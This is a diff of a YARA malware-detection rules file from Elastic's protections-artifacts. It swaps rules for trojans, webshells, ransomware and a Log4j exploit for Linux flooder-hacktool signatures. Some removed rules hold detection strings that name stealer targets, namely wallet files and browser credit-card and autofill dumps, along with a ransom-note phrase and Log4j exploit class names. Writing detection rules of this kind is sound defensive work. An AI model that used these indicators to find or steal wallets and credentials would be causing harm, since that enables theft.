"25c48456-2f83-41a8-ba37-b557014d1d86" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L417-L435" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "23813dc4aa56683e1426e5823adc3aab854469c9c0f3ec1a3fad40fa906929f2" - logic_hash = "9902758dfb61e8b60b281f3f51cda8a10d58eb0cc20743f97998d7bcf120c299" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L300-L318" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "eba6f3e4f7b53e22522d82bdbdf5271c3fc701cbe07e9ecb7b4c0b85adc9d6b4" + logic_hash = "4ed4b901fccaed834b9908fb447da1521bf31f283ae55b6d8f6090814cf8fcd2" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4d276b225f412b3879db19546c09d1dea2ee417c61ab6942c411bc392fee8e26" + fingerprint = "0c79f8eaacd2aa1fa60d5bfb7b567a9fc3e65068be1516ca723cb1394bb564ce" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65390,28 +66288,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_8677Dca3 : FILE MEMORY os = "linux" strings: - $a = { F2 5E 83 C2 03 8B FF C1 E2 05 9C 83 C5 69 9D 8D 6D 97 03 C2 56 8B 74 } + $a = { 45 F8 48 83 6D E0 01 48 83 7D E0 00 75 DD 48 8B 45 F0 C9 C3 55 48 } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_Ebce4304 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_B1Ca2Abd : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "ebce4304-0a06-454f-ad08-98b323e5b23a" - date = "2022-09-12" - modified = "2022-10-18" + id = "b1ca2abd-b8ab-435d-85b6-a1c93212e492" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L437-L455" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2e06caf864595f2df7f6936bb1ccaa1e0cae325aee8659ee283b2857e6ef1e5b" - logic_hash = "42fbfc2c2636c2e3a5da5e51c6bf99f6114ec7d00b88371a34e1fdbe81d1264a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L320-L338" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1d88971f342e4bc4e6615e42080a3b6cec9f84912aa273c36fc46aaf86ff6771" + logic_hash = "05b906a9823bf9ba25ba1ed490beb8f338429cbc744ca230c5c4cbb41ab9f140" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "20f0346bf021e3d2a0e25bbb3ed5b9c0a45798d0d5b2516b679f7bf17d1b040d" + fingerprint = "214c9dedf34b2c8502c6ef14aff5727ac5a2941e1a8278a48d34fea14d584a1a" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65419,28 +66317,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_Ebce4304 : FILE MEMORY os = "linux" strings: - $a = { 24 8D 64 24 04 87 54 24 00 56 8B 74 24 04 5E 9D 9C 83 C5 1E 9D 8D } + $a = { C4 48 89 E0 48 83 C0 07 48 C1 E8 03 48 C1 E0 03 48 89 45 B0 C7 45 AC 14 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_073E6161 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_Cce8C792 : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "073e6161-35a3-4e5e-a310-8cc50cb28edf" - date = "2022-09-12" - modified = "2022-10-18" + id = "cce8c792-ef3e-43c2-b4ad-343de6a69cc7" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L457-L475" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2e06caf864595f2df7f6936bb1ccaa1e0cae325aee8659ee283b2857e6ef1e5b" - logic_hash = "2c98058add77c55ab68491eec041d7670f726a9ec93258ae7bb8f0e6721b4ca3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L340-L358" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ea56da9584fc36dc67cb1e746bd13c95c4d878f9d594e33221baad7e01571ee6" + logic_hash = "14700d24e8682ec04f2aae02f5820c4d956db60583b1bc61038b47e709705d0d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "12d04597fd60ed143a1b256889eefee1f5a8c77f4f300e72743e3cfa98ba8e99" + fingerprint = "03541eb8a293e88c0b8e6509310f8c57f2cd16b5ff76783a73bde2b614b607fc" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65448,28 +66346,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_073E6161 : FILE MEMORY os = "linux" strings: - $a = { F9 83 F8 1F 77 33 80 BC 35 B9 FF FF FF 63 76 29 8B 44 24 14 40 8D } + $a = { 01 48 89 51 08 48 8B 45 A0 8B 55 CC 48 63 D2 48 C1 E2 05 48 } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_Bef22375 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_4Bcea1C4 : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "bef22375-0a71-4f5b-bfd1-e2e718b5c36f" - date = "2022-09-12" - modified = "2022-10-18" + id = "4bcea1c4-de08-4526-8d31-89c5512f07af" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L477-L495" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f47baf48deb71910716beab9da1b1e24dc6de9575963e238735b6bcedfe73122" - logic_hash = "3991ebdb310338516d5fdd137ba2ac63dc870337785a31d59dcad49135f190e5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L360-L378" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9a564d6b29d2aaff960e6f84cd0ef4c701fefa2a62e2ea690106f3fdbabb0d71" + logic_hash = "76019729a3a33fc04ff983f38b4fbf174a66da7ffc05cd07eb93e3cd5aecaaa2" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0128e8725a0949dd23c23addc1158d28c334cfb040aad2b8f8d58f39720c41ef" + fingerprint = "e859966e8281e024c82dedd5bd237ab53af28a0cb21d24daa456e5cd1186c352" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65477,28 +66375,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_Bef22375 : FILE MEMORY os = "linux" strings: - $a = { C5 35 9D 8D 6D CB 8B 12 9C 83 C5 17 9D 8D 6D E9 6A 04 F7 14 24 FF } + $a = { 50 FF 48 8B 45 C0 48 01 D0 0F B6 00 3C 0A 74 22 48 8B 45 C0 48 } condition: all of them } -rule ELASTIC_Linux_Webshell_Generic_E80Ff633 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_Ab561A1B : FILE MEMORY { meta: - description = "Detects Linux Webshell Generic (Linux.Webshell.Generic)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "e80ff633-990e-4e2e-ac80-2e61685ab8b0" + id = "ab561a1b-d8dd-4768-9b4c-07ef4777b252" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Webshell_Generic.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7640ba6f2417931ef901044152d5bfe1b266219d13b5983d92ddbdf644de5818" - logic_hash = "d345e6ce3e51ed55064aafb1709e9bee7ef2ce87ec80165ac1b58eebd83cefee" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L380-L398" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1b7df0d491974bead05d04ede6cf763ecac30ecff4d27bb4097c90cc9c3f4155" + logic_hash = "5720d2ada4b33514f2d528417876606d2951786df8b0512f9e8833b8ec87127a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "dcca52dce2d50b0aa6cf0132348ce9dc234b985ae683b896d9971d409f109849" + fingerprint = "081dd5eb061c8023756e413420241e20a2c86097f95859181ca5d6b1d24fdd76" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65506,56 +66404,57 @@ rule ELASTIC_Linux_Webshell_Generic_E80Ff633 : FILE MEMORY os = "linux" strings: - $a = { 24 A8 00 00 00 89 1C 24 83 3C 24 00 74 23 83 04 24 24 8D B4 24 AC 00 } + $a = { B5 50 FF FF FF 64 48 8B 04 25 28 00 00 00 48 89 45 C8 31 C0 83 BD 5C FF FF } condition: all of them } -rule ELASTIC_Linux_Webshell_Generic_41A5Fa40 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_1A4Eb229 : FILE MEMORY { meta: - description = "Detects Linux Webshell Generic (Linux.Webshell.Generic)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "41a5fa40-a4e7-4c97-a3b9-3700743265df" - date = "2021-06-28" + id = "1a4eb229-a194-46a5-8e93-370a40ba999b" + date = "2021-01-12" modified = "2021-09-16" - reference = "18ac7fbc3d8d3bb8581139a20a7fee8ea5b7fcfea4a9373e3d22c71bae3c9de0" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Webshell_Generic.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "574148bc58626aac00add1989c65ad56315c7e2a8d27c7b96be404d831a7a576" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L400-L418" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "bf6f3ffaf94444a09b69cbd4c8c0224d7eb98eb41514bdc3f58c1fb90ac0e705" + logic_hash = "83b04e366a05a46ad67b9aaf6b9658520e119003cd65941dd69416cbc5229c30" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "49e0d55579453ec37c6757ddb16143d8e86ad7c7c4634487a1bd2215cd22df83" - severity = "100" + fingerprint = "de076ef23c2669512efc00ddfe926ef04f8ad939061c69131a0ef9a743639371" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a = { 5A 46 55 6C 73 6E 55 6B 56 52 56 55 56 54 56 46 39 56 55 6B 6B } + $a = { F4 8B 45 E8 83 C0 01 89 45 F8 EB 0F 8B 45 E8 83 C0 01 89 45 F4 8B } condition: all of them } -rule ELASTIC_Linux_Exploit_Courier_190258Dd : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_51Ef0659 : FILE MEMORY { meta: - description = "Detects Linux Exploit Courier (Linux.Exploit.Courier)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "190258dd-1384-4144-aa05-7957ca0b464b" - date = "2021-04-06" + id = "51ef0659-2691-4558-bff8-fce614f10ab9" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Courier.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "349866d0fb81d07a35b53eac6f11176721629bbd692526851e483eaa83d690c3" - logic_hash = "c318d78a11a021334c84a21db2be6d7df57440a1f3ad6feaaff9cc95ebf6f716" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L420-L438" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b7a2bc75dd9c44c38b2a6e4e7e579142ece92a75b8a3f815940c5aa31470be2b" + logic_hash = "26dd95cb1cdaec10d408e294a3baca85d741cf5e56649cdcc79ef7216e4cb440" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4ba94b87847a76df80200d40383d2d289dc463faa609237dbc43f317db45074d" + fingerprint = "41f517a19a3c4dc412200b683f4902a656f3dcfdead8b8292e309413577c3850" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65563,28 +66462,28 @@ rule ELASTIC_Linux_Exploit_Courier_190258Dd : FILE MEMORY os = "linux" strings: - $a = { E3 31 C0 50 54 53 50 B0 3B CD 80 31 C0 B0 01 CD } + $a = { E0 03 48 89 45 B0 8B 45 9C 48 63 D0 48 83 EA 01 48 89 55 B8 48 } condition: all of them } -rule ELASTIC_Linux_Ransomware_Blackbasta_96Eb3F20 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_D90C4Cbe : FILE MEMORY { meta: - description = "Detects Linux Ransomware Blackbasta (Linux.Ransomware.BlackBasta)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "96eb3f20-9c40-4d40-8a6c-568a51c52d4d" - date = "2022-08-06" - modified = "2022-08-16" + id = "d90c4cbe-4d0a-4341-a58b-a472b67282d6" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_BlackBasta.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "96339a7e87ffce6ced247feb9b4cb7c05b83ca315976a9522155bad726b8e5be" - logic_hash = "a5e0b60ba51490f70af53c9fba91e3349c712bebb10574eb4bed028ab961ae74" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L440-L458" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "409c55110d392aed1a9ec98a6598fb8da86ab415534c8754aa48e3949e7c4b62" + logic_hash = "145d32f8a06af18e6f13b0905cc51fd7b1a9e00b41b0f0a5d537ada2b54a94b5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5146ad9def7ccaba4b4896f345b0950c587ad5f96a106ec461caeb028d809ead" + fingerprint = "64796aa7faa2e945b5c856c1c913cb62175413dc1df88505dececcfbd2878cb1" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65592,510 +66491,492 @@ rule ELASTIC_Linux_Ransomware_Blackbasta_96Eb3F20 : FILE MEMORY os = "linux" strings: - $a1 = "Done time: %.4f seconds, encrypted: %.4f gb" ascii fullword - $a2 = "Your data are stolen and encrypted" ascii fullword - $a3 = "fileEncryptionPercent" ascii fullword - $a4 = "fileQueueLocker" ascii fullword - $a5 = "totalBytesEncrypted" ascii fullword - $seq_encrypt_block = { 41 56 31 D2 41 55 41 54 49 89 FE 55 53 48 89 F5 49 63 D8 4C } - $seq_encrypt_thread = { 4C 8B 74 24 ?? 31 DB 45 31 FF 4D 8B 6E ?? 49 83 FD ?? 0F 87 ?? ?? ?? ?? 31 C0 4D 39 EF 0F 82 ?? ?? ?? ?? 48 01 C3 4C 39 EB 0F 83 ?? ?? ?? ?? } + $a = { 89 D8 F7 D0 5B 5D C3 55 48 89 E5 48 83 EC 40 48 89 7D C8 48 89 } condition: - 3 of ($a*) and 1 of ($seq*) + all of them } -rule ELASTIC_Macos_Exploit_Log4J_75A13888 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_C680C9Fd : FILE MEMORY { meta: - description = "Detects Macos Exploit Log4J (MacOS.Exploit.Log4j)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "75a13888-7650-4ef3-adec-15378c8479bd" - date = "2021-12-13" - modified = "2022-07-22" + id = "c680c9fd-34ad-4d92-b8d6-1b511c7c07a3" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Exploit_Log4j.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "b09d8dd9c422e7eb8aa23f8b1204d31fd290252925099300d6d19d73e562ca5e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L460-L478" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ea56da9584fc36dc67cb1e746bd13c95c4d878f9d594e33221baad7e01571ee6" + logic_hash = "a283132ffdd109b8b1f01e5a3e2700b70b742945c7ae8b15b2b244fb249a5e3d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "cd06db6f5bebf0412d056017259b5451184d5ba5b2976efd18fa8f96dba6a159" + fingerprint = "5cb5b36d3ae5525b992a9d395b54429f52b11ea229e0cecbd62317af7b5faf84" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $jndi1 = "jndi.ldap.LdapCtx.c_lookup" - $jndi2 = "logging.log4j.core.lookup.JndiLookup.lookup" - $jndi3 = "com.sun.jndi.url.ldap.ldapURLContext.lookup" - $exp1 = "Basic/Command/Base64/" - $exp2 = "java.lang.ClassCastException: Exploit" - $exp3 = "WEB-INF/classes/Exploit" - $exp4 = "Exploit.java" + $a = { 45 A0 8B 55 CC 48 63 D2 48 C1 E2 05 48 01 D0 48 8D 48 10 48 8B } condition: - 2 of ($jndi*) and 1 of ($exp*) + all of them } -rule ELASTIC_Windows_Trojan_Vidar_9007Feb2 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_E63396F4 : FILE MEMORY { meta: - description = "Detects Windows Trojan Vidar (Windows.Trojan.Vidar)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "9007feb2-6ad1-47b6-bae2-3379d114e4f1" - date = "2021-06-28" - modified = "2021-08-23" + id = "e63396f4-a297-4d99-b341-34cb22498078" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Vidar.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec" - logic_hash = "fcdef7397f17ee402155e526c6fa8b51f3ea96e203a095b0b4c36cb7d3cc83d1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L480-L498" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "913e6d2538bd7eed3a8f3d958cf445fe11c5c299a70e5385e0df6a9b2f638323" + logic_hash = "d3f7c62a7411caf86ee574a686b4b1972066602f89d39ae9e49ba66d9917c7c9" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8416b14346f833264e32c63253ea0b0fe28e5244302b2e1b266749c543980fe2" + fingerprint = "269285d03ea1a3b41ff134ab2cf5e22502626c72401b83add6c1e165f4dd83f8" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { E8 53 FF D6 50 FF D7 8B 45 F0 8D 48 01 8A 10 40 3A D3 75 F9 } + $a = { 02 83 45 FC 01 81 7D FC FF 0F 00 00 7E ?? 90 } condition: all of them } -rule ELASTIC_Windows_Trojan_Vidar_114258D5 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_7D5355Da : FILE MEMORY { meta: - description = "Detects Windows Trojan Vidar (Windows.Trojan.Vidar)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "114258d5-f05e-46ac-914b-1a7f338ccf58" + id = "7d5355da-5fbd-46c0-8bd2-33a27cbcca63" date = "2021-06-28" - modified = "2021-08-23" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Vidar.yar#L21-L44" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec" - logic_hash = "9ea3ea0533d14edd0332fa688497efd566a890d1507214fc8591a0a11433d060" + modified = "2021-09-16" + reference = "03397525f90c8c2242058d2f6afc81ceab199c5abcab8fd460fabb6b083d8d20" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L500-L518" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "b4540f941ca1a36c460d056ef263ebd67c6388f3f6f373f50371f7cca2739bc4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934" - severity = 100 + fingerprint = "52882595f28e1778ee3b0e6bda94319f5c348523f16566833281f19912360270" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "BinanceChainWallet" fullword - $a2 = "*wallet*.dat" fullword - $a3 = "SOFTWARE\\monero-project\\monero-core" fullword - $b1 = "CC\\%s_%s.txt" fullword - $b2 = "History\\%s_%s.txt" fullword - $b3 = "Autofill\\%s_%s.txt" fullword + $a = { 89 E5 48 83 EC 60 64 48 8B 04 25 28 00 00 00 48 89 45 F8 31 C0 BF 0A 00 } condition: - 1 of ($a*) and 1 of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Vidar_32Fea8Da : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_A9E8A90F : FILE MEMORY { meta: - description = "Detects Windows Trojan Vidar (Windows.Trojan.Vidar)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "32fea8da-b381-459c-8bf4-696388b8edcc" - date = "2023-05-04" - modified = "2023-06-13" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Vidar.yar#L46-L66" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6f5c24fc5af2085233c96159402cec9128100c221cb6cb0d1c005ced7225e211" - logic_hash = "1a18cdc3bd533c34eb05b239830ecec418dc76ee9f4fcfc48afc73b07d55b3cd" + id = "a9e8a90f-5d95-4f4e-a9e0-c595be3729dd" + date = "2021-06-28" + modified = "2021-09-16" + reference = "0558cf8cab0ba1515b3b69ac32975e5e18d754874e7a54d19098e7240ebf44e4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L520-L538" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "8f1fcb736a9363142a25426ef2d166f92526bffaf8069f1b12056c9cf5825379" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "ebcced7b2924cc9cfe9ed5b5f84a8959e866a984f2b5b6e1ec5b1dd096960325" - severity = 100 + fingerprint = "a06bbcbc09e5e44447b458d302c47e4f18438be8d57687700cb4bf3f3630fba8" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 4F 4B 58 20 57 65 62 33 20 57 61 6C 6C 65 74 } - $a2 = { 8B E5 5D C3 5E B8 03 00 00 00 5B 8B E5 5D C3 5E B8 08 00 00 } - $a3 = { 83 79 04 00 8B DE 74 08 8B 19 85 DB 74 62 03 D8 8B 03 85 C0 } + $a = { 45 D8 48 89 45 F0 66 C7 45 EE 00 00 EB 19 48 8B 45 F0 48 8D } condition: all of them } -rule ELASTIC_Macos_Trojan_Amcleaner_445Bb666 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_A598192A : FILE MEMORY { meta: - description = "Detects Macos Trojan Amcleaner (MacOS.Trojan.Amcleaner)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "445bb666-1707-4ad9-a409-4a21de352957" - date = "2021-10-05" - modified = "2021-10-25" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Amcleaner.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c85bf71310882bc0c0cf9b74c9931fd19edad97600bc86ca51cf94ed85a78052" - logic_hash = "664829ff761186ec8f3055531b5490b7516756b0aa9d0183d4c17240a5ca44c4" + id = "a598192a-c804-4c57-9cc3-c2205cb431d3" + date = "2021-06-28" + modified = "2021-09-16" + reference = "101f2240cd032831b9c0930a68ea6f74688f68ae801c776c71b488e17bc71871" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L540-L558" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "19909f53acca8c84125c95fc651765a25162c5f916366da8351e67675393e583" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "355c7298a4148be3b80fd841b483421bde28085c21c00d5e4a42949fd8026f5b" - severity = 100 + fingerprint = "61cb72180283746ebbd82047baffc4bf2384658019970c4dceadfb5c946abcd2" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 10 A0 5B 15 57 A8 8B 17 02 F9 A8 9B E8 D5 8C 96 A7 48 42 91 E5 EC 3D C8 AC 52 } + $a = { 8D 65 D8 5B 5E 5F C9 C3 8D 36 55 89 E5 83 EC 18 57 56 53 8B } condition: all of them } -rule ELASTIC_Macos_Trojan_Amcleaner_A91D3907 